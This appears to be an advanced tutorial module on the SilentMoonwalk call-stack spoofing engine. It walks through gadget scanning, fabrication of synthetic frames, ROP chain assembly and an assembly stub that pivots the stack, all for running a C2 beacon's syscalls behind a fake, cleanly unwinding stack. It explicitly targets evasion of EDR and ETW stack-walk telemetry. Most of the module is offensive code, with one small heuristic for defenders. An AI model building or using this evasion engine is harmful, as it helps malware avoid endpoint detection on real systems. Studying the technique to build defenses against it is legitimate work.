Difficulty: Advanced

Module 7: The Full Spoof Engine

Assembling every piece into a complete, walkable, executable spoofed call stack.

The Complete Picture

This module brings together everything from the previous six modules into SilentMoonwalk's end-to-end algorithm. We'll trace the complete lifecycle: from selecting a target call chain, through gadget matching and frame construction, to the actual ROP-driven syscall invocation with a fully spoofed stack. A stack that both executes as a ROP chain and unwinds cleanly is what distinguishes SilentMoonwalk from prior approaches.

High-Level Algorithm Overview

SilentMoonwalk's spoofing engine executes in five phases. Each phase builds on the results of the previous one:

SilentMoonwalk Execution Phases

Phase 1: Initialization → Phase 2: Chain Selection → Phase 3: Frame Fabrication → Phase 4: ROP Assembly → Phase 5: Execution

Phase 1: Initialization

At startup, SilentMoonwalk scans loaded modules to build its gadget database and function catalog:

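C++
// Phase 1: One-time initialization
class SpoofEngine {
    GadgetDB gadgets;
    std::vector<FunctionInfo> functionCatalog;
    HMODULE hNtdll;
    HMODULE hKernel32;
    HMODULE hKernelBase;
    // RUNTIME_FUNCTION entries for the two terminal frames
    PRUNTIME_FUNCTION pBaseThreadInitThunk = nullptr;
    PRUNTIME_FUNCTION pRtlUserThreadStart  = nullptr;

public:
    void Initialize() {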
        // 1. Get handles to system modules
        hNtdll     = GetModuleHandleA("ntdll.dll");
        hKernel32  = GetModuleHandleA("kernel32.dll");
        hKernelBase = GetModuleHandleA("kernelbase.dll");

        // 2. Build gadget database from all system modules
        gadgets.Build(hNtdll);
        gadgets.Build(hKernel32);
        gadgets.Build(hKernelBase);

        // 3. Catalog all functions with their frame sizes
        CatalogFunctions(hNtdll);
        CatalogFunctions(hKernel32);
        CatalogFunctions(hKernelBase);

        // 4. Identify critical termination frames
        //    Every thread stack ends with these two frames
        resolveTerminalFrames();
    }

    void resolveTerminalFrames() {
        // Threads started the normal way have these two frames at the
        // bottom of their stack (the offsets shown are from one build
        // and vary across Windows versions):
        //   kernel32!BaseThreadInitThunk+0x14
        //   ntdll!RtlUserThreadStart+0x21
        // We need the RUNTIME_FUNCTION for each to compute
        // their exact frame sizes for the synthetic chain.

        DWORD64 imgBase;
        pBaseThreadInitThunk = RtlLookupFunctionEntry(
            (DWORD64)GetProcAddress(hKernel32, "BaseThreadInitThunk"),
            &imgBase, NULL
        );
        pRtlUserThreadStart = RtlLookupFunctionEntry(
            (DWORD64)GetProcAddress(hNtdll, "RtlUserThreadStart"),
            &imgBase, NULL
        );
    }
};

Phase 2: Call Chain Selection

When a spoofed call is requested, SilentMoonwalk selects a realistic call chain. The chain must be plausible for the API being called. For example, a thread blocked in NtWaitForSingleObject should show a chain through the WaitForSingleObject family of functions, whereas a thread in Sleep or SleepEx blocks in NtDelayExecution and needs a chain that ends there instead:

C++
// Phase 2: Select a plausible call chain for the target syscall
struct CallChainSpec {
    PVOID               targetApi;      // The actual API to call
    std::vector<PVOID>  spoofedChain;   // Functions to appear on stack
};

CallChainSpec SelectCallChain(PVOID targetApi) {
    CallChainSpec spec;
    spec.targetApi = targetApi;

    // Build a realistic chain ending at the standard thread entry
    // For NtWaitForSingleObject, a typical chain might be:
    //
    //   NtWaitForSingleObject           (the syscall itself)
    //   KERNELBASE!WaitForSingleObjectEx (wrapper that calls Nt*)
    //   <application function>           (we skip this - too specific)
    //   kernel32!BaseThreadInitThunk     (standard thread entry)
    //   ntdll!RtlUserThreadStart         (thread bootstrap)
    //
    // Sleep and SleepEx are not part of this path: they block in
    // NtDelayExecution, so they belong in a chain for that syscall.

    spec.spoofedChain = {
        GetProcAddress(hKernelBase, "WaitForSingleObjectEx"),
        GetProcAddress(hKernel32,   "BaseThreadInitThunk"),
        GetProcAddress(hNtdll,      "RtlUserThreadStart")
    };

    return spec;
}

Chain Plausibility

The spoofed chain should represent a realistic call path. An EDR might cross-reference the chain to verify that function A actually calls function B in its code. SilentMoonwalk selects functions from known call paths in the Windows API. For a beacon that waits on an object, WaitForSingleObjectEx → NtWaitForSingleObject is one of the most common patterns in legitimate software; for a beacon that sleeps, the equivalent is SleepEx → NtDelayExecution.
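
From the defender's side, a cheaper relative of this cross-check is to confirm that each return address on the stack is immediately preceded by a CALL instruction. The sketch below is not part of SilentMoonwalk; `IsCallPreceded` is a hypothetical name, it works on a plain byte buffer rather than live process memory, and it recognizes only three common x64 CALL encodings, so treat it as a partial heuristic rather than a full decoder.

```cpp
#include <cstddef>
#include <cstdint>

// Hypothetical defender-side heuristic: returns true if the bytes just
// before `retOffset` in `code` look like one of three CALL encodings.
// A byte match can be coincidental, so this is a hint, not proof.
bool IsCallPreceded(const uint8_t* code, size_t codeSize, size_t retOffset) {
    if (retOffset > codeSize) return false;

    // E8 rel32: direct near call (5 bytes)
    if (retOffset >= 5 && code[retOffset - 5] == 0xE8) return true;

    // FF 15 disp32: call qword ptr [rip+disp32] (6 bytes),
    // the usual form for calls through the import table
    if (retOffset >= 6 &&
        code[retOffset - 6] == 0xFF && code[retOffset - 5] == 0x15) {
        return true;
    }

    // FF /2 with mod == 11b: call through a register, e.g. FF D0 = call rax
    if (retOffset >= 2 && code[retOffset - 2] == 0xFF) {
        uint8_t modrm = code[retOffset - 1];
        if ((modrm & 0xF8) == 0xD0) return true;  // mod=11, reg=010
    }

    return false;
}
```

A return address that fails this test is a strong anomaly, while one that passes still says nothing about whether the caller really reaches the callee, which is the stricter cross-reference described above.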

Phase 3: Frame Fabrication

With the call chain selected, SilentMoonwalk computes the frame size for each function and assigns each frame its offset within the synthetic stack:

C++
// Phase 3: Compute frame sizes and build synthetic frame map
struct SyntheticFrame {
    PRUNTIME_FUNCTION pFunc;
    PUNWIND_INFO      pUnwind;
    DWORD             frameSize;      // Allocation + pushes
    DWORD             totalSize;      // Including return address slot
    PVOID             returnAddr;     // Points into next function in chain
    DWORD             stackOffset;    // Offset from synthetic stack base
    std::vector<RegisterSave> savedRegs;  // Non-volatile reg saves
};

std::vector<SyntheticFrame> FabricateFrames(CallChainSpec& spec) {
    std::vector<SyntheticFrame> frames;
    DWORD totalStackNeeded = 0;

    for (size_t i = 0; i < spec.spoofedChain.size(); i++) {
        SyntheticFrame sf;
        DWORD64 imageBase;

        // Look up the RUNTIME_FUNCTION for this chain entry
        sf.pFunc = RtlLookupFunctionEntry(
            (DWORD64)spec.spoofedChain[i], &imageBase, NULL
        );
        sf.pUnwind = (PUNWIND_INFO)(imageBase + sf.pFunc->UnwindData);
        sf.frameSize = ComputeFrameSize(sf.pUnwind);
        sf.totalSize = sf.frameSize + 8; // +8 for return address

        // Determine return address: point into the NEXT function
        if (i + 1 < spec.spoofedChain.size()) {
            sf.returnAddr = FindReturnAddress(
                /* next func's RUNTIME_FUNCTION */
                LookupFunc(spec.spoofedChain[i + 1]),
                imageBase
            );
        } else {
            sf.returnAddr = NULL; // Terminal frame
        }

        // Parse saved register locations from unwind codes
        sf.savedRegs = ParseRegisterSaves(sf.pUnwind);

        sf.stackOffset = totalStackNeeded;
        totalStackNeeded += sf.totalSize;
        frames.push_back(sf);
    }

    return frames;
}
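
To make the offset bookkeeping in FabricateFrames concrete, the standalone sketch below reproduces only the arithmetic: each frame takes its size plus 8 bytes for the return address slot, and its offset is the running total of everything before it. `FrameLayout` and `LayOutFrames` are hypothetical names, and the frame sizes in the usage note are made-up values, not measurements from any real function.

```cpp
#include <cassert>
#include <cstdint>
#include <vector>

// Hypothetical, reduced version of SyntheticFrame: sizes and offsets only.
struct FrameLayout {
    uint32_t frameSize;    // allocation + pushes, as reported by unwind data
    uint32_t totalSize;    // frameSize + 8 for the return address slot
    uint32_t stackOffset;  // offset of this frame from the synthetic base
};

// Assigns consecutive offsets to frames, mirroring the loop above.
std::vector<FrameLayout> LayOutFrames(const std::vector<uint32_t>& frameSizes) {
    std::vector<FrameLayout> layout;
    uint32_t running = 0;
    for (uint32_t size : frameSizes) {
        // x64 stack allocations and pushes are always multiples of 8 bytes.
        assert(size % 8 == 0);
        FrameLayout f{size, size + 8, running};
        running += f.totalSize;
        layout.push_back(f);
    }
    return layout;
}
```

With the made-up sizes 0x38, 0x48 and 0x28, the three frames land at offsets 0x00, 0x40 and 0x90, and the whole chain needs 0xC0 bytes.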

Phase 4: ROP Chain Assembly

This is the most complex phase. The synthetic frame data must simultaneously serve as a valid ROP chain for execution AND a valid unwind chain for inspection. SilentMoonwalk weaves gadget addresses into the frame data at positions that are both reachable during ROP execution and benign during unwinding:

C++
// Phase 4: Assemble the dual-purpose stack layout
void AssembleRopChain(
    PBYTE syntheticStack,
    std::vector<SyntheticFrame>& frames,
    PVOID targetApi,
    PVOID targetApiArgs[4],     // RCX, RDX, R8, R9
    PVOID rbxTrampoline         // Pointer to memory holding targetApi addr
) {
    DWORD offset = 0;

    // === STAGE A: Parameter setup (before the spoofed frames) ===
    // Place POP gadgets to load API arguments into registers
    // These execute first in the ROP chain

    // pop rcx; ret -- loads first argument
    *(PVOID*)(syntheticStack + offset) = gadgets.popRcx;
    offset += 8;
    *(PVOID*)(syntheticStack + offset) = targetApiArgs[0]; // RCX value
    offset += 8;

    // pop rdx; ret -- loads second argument
    *(PVOID*)(syntheticStack + offset) = gadgets.popRdx;
    offset += 8;
    *(PVOID*)(syntheticStack + offset) = targetApiArgs[1]; // RDX value
    offset += 8;

    // pop r8; ret -- loads third argument
    *(PVOID*)(syntheticStack + offset) = gadgets.popR8;
    offset += 8;
    *(PVOID*)(syntheticStack + offset) = targetApiArgs[2]; // R8 value
    offset += 8;

    // pop r9; ret -- loads fourth argument
    *(PVOID*)(syntheticStack + offset) = gadgets.popR9;
    offset += 8;
    *(PVOID*)(syntheticStack + offset) = targetApiArgs[3]; // R9 value
    offset += 8;

    // === STAGE B: JMP [RBX] trampoline ===
    // RBX was set up earlier to point to memory containing targetApi addr
    // The JMP transfers control WITHOUT pushing a return address
    *(PVOID*)(syntheticStack + offset) = gadgets.jmpRbx;
    offset += 8;

    // === STAGE C: Fake return address ===
    // When targetApi executes RET, it pops this address.
    // This is where the spoofed stack begins from the unwinder's view.
    // It points into the first function in our spoofed chain.
    *(PVOID*)(syntheticStack + offset) = frames[0].returnAddr;
    offset += 8;

    // === STAGE D: Synthetic frames ===
    // Each frame occupies exactly the right number of bytes
    for (size_t i = 0; i < frames.size(); i++) {
        SyntheticFrame& sf = frames[i];

        // Fill frame body with plausible data
        // The local variable area can contain recovery gadgets
        FillFrameBody(syntheticStack + offset, sf);

        // Place saved register values at correct offsets
        for (auto& reg : sf.savedRegs) {
            *(DWORD64*)(syntheticStack + offset + reg.stackOffset) =
                GeneratePlausibleRegValue(hNtdll, hKernel32);
        }

        // Place return address at end of frame
        *(PVOID*)(syntheticStack + offset + sf.frameSize) = sf.returnAddr;

        offset += sf.totalSize;
    }
}

The Dual-Purpose Challenge

The synthetic stack serves double duty. During ROP execution, RSP advances through the parameter setup gadgets and then the JMP [RBX] trampoline transfers to the target API. During stack unwinding (triggered by an EDR), the unwinder starts at the first spoofed return address and walks toward higher addresses, from the newest synthetic frame to the oldest. These two traversals operate on overlapping but different portions of the stack data, which is why careful offset calculation is essential.

Phase 5: Execution

With the synthetic stack fully assembled, SilentMoonwalk pivots RSP to the synthetic stack and begins the ROP chain. This is done via an assembly stub:

x86-64 ASM
; SilentMoonwalk's execution stub (simplified)
; Called from C++ with the synthetic stack address in RCX

SpoofAndCall PROC
    ; Save all non-volatile registers (callee-saved)
    push rbp
    push rbx
    push rdi
    push rsi
    push r12
    push r13
    push r14
    push r15

    ; Save the real RSP so we can restore it later
    mov r15, rsp           ; R15 = real stack pointer (saved)

    ; Set up RBX for the JMP [RBX] trampoline
    ; RCX = pointer to struct { PVOID pTargetApi; BYTE syntheticStack[...]; }
    lea rbx, [rcx]         ; RBX = pointer to target API address

    ; Pivot RSP to the synthetic stack
    ; The ROP chain starts at offset 8 in the synthetic buffer
    lea rsp, [rcx + 8]     ; RSP now points to our ROP chain

    ; Begin ROP execution:
    ; RSP -> [pop rcx gadget addr]
    ;        [RCX value]
    ;        [pop rdx gadget addr]
    ;        [RDX value]
    ;        ... (parameter setup)
    ;        [JMP [RBX] gadget addr]
    ;
    ; The first RET pops and jumps to pop rcx gadget.
    ; Each gadget's RET chains to the next.
    ; JMP [RBX] transfers to the target API.
    ; Target API's RET lands on our spoofed return address.

    ret                    ; Start the ROP chain!

    ; === Recovery point ===
    ; After the target API returns through the spoofed chain,
    ; a recovery gadget redirects execution here
RecoveryPoint:
    ; Restore real RSP
    mov rsp, r15

    ; Restore non-volatile registers
    pop r15
    pop r14
    pop r13
    pop r12
    pop rsi
    pop rdi
    pop rbx
    pop rbp

    ret                    ; Return to caller with spoofed call complete
SpoofAndCall ENDP

The Recovery Mechanism

After the target API returns through the spoofed stack frames, execution must return to the real code. SilentMoonwalk embeds a recovery gadget address within the synthetic frames that, when reached during ROP unwinding, redirects execution back to the recovery point:

C++
// The recovery mechanism:
// 1. Target API (e.g., NtWaitForSingleObject) returns
// 2. It pops the first spoofed return address from the stack
// 3. Execution lands at the first frame's "body" area
// 4. The frame body contains an ADD RSP, N; RET gadget that
//    advances RSP through the frame to the next return address
// 5. This chain continues through each synthetic frame
// 6. The last frame's return address points to the RecoveryPoint
//    in the assembly stub
// 7. Execution returns to the real caller with the original RSP

// Alternatively, a simpler recovery approach:
// The first spoofed return address can directly point to a
// gadget that restores RSP from a saved register (e.g., R15):
//   mov rsp, r15
//   ret
// This immediately collapses the synthetic stack and returns
// to the real code. However, this gadget is harder to find
// with valid unwind metadata.

Complete Execution Timeline

1. Save real RSP, pivot to synthetic stack

2. ROP: POP RCX/RDX/R8/R9 (load arguments)

3. ROP: JMP [RBX] → target API begins executing

4. Target API runs (stack looks clean to any inspector)

5. Target API RET → pops spoofed return address

6. ROP: Recovery gadgets chain through synthetic frames

7. Restore real RSP, return to original caller

Handling the Syscall Boundary

For direct syscalls (where the beacon executes the syscall instruction itself rather than calling through ntdll), SilentMoonwalk must ensure the synthetic stack is already in place at the exact moment the syscall instruction executes. Kernel-side telemetry, such as ETW events with stack walking enabled, captures the user-mode stack while the thread is inside the syscall:

C++
// For direct syscall invocation with spoofed stack:
// The synthetic stack must be in place BEFORE the syscall instruction.
//
// Approach:
// 1. Build synthetic stack as above
// 2. Then either:
//    (a) place the syscall stub (mov r10, rcx; mov eax, SSN; syscall)
//        at the bottom of the ROP chain, or
//    (b) use the JMP [RBX] gadget to jump to ntdll's syscall stub
//        (the actual 'syscall' instruction inside ntdll)
//
// Option (b) is preferred because:
// - No return address is pushed (we used JMP, not CALL), so the top of
//   the stack is our spoofed address pointing into a legitimate function
// - The kernel sees RSP pointing to our synthetic stack
// - ETW stack capture walks our synthetic frames correctly
// - The syscall instruction itself is inside ntdll (legitimate location)

The Elegance of JMP-Based Syscalls

By using JMP [RBX] to reach ntdll's syscall stub instead of CALL, SilentMoonwalk avoids pushing any return address. The stack at the moment of syscall execution contains only the synthetic frames. The kernel's ETW stack walker processes these frames using RtlVirtualUnwind and sees a completely normal call chain. This is why JMP [RBX] is the linchpin of the entire technique.

Complete Data Flow

Here is the complete data dependency between all components:

Component	Inputs	Outputs	Consumed By
Module Scanner	ntdll, kernel32, kernelbase .pdata	Function catalog + UNWIND_INFO	Gadget search, frame fabrication
Gadget Scanner	.text sections, RUNTIME_FUNCTIONs	Gadget database (indexed by type/size)	ROP chain assembly
Chain Selector	Target API identity	Ordered list of spoofed functions	Frame fabrication
Frame Fabricator	Chain spec + UNWIND_INFOs	Frame sizes, register save maps, return addrs	ROP assembly
ROP Assembler	Gadgets + frames + API args	Synthetic stack buffer	Execution stub
Execution Stub	Synthetic stack + RSP pivot	API call with spoofed stack	Target API
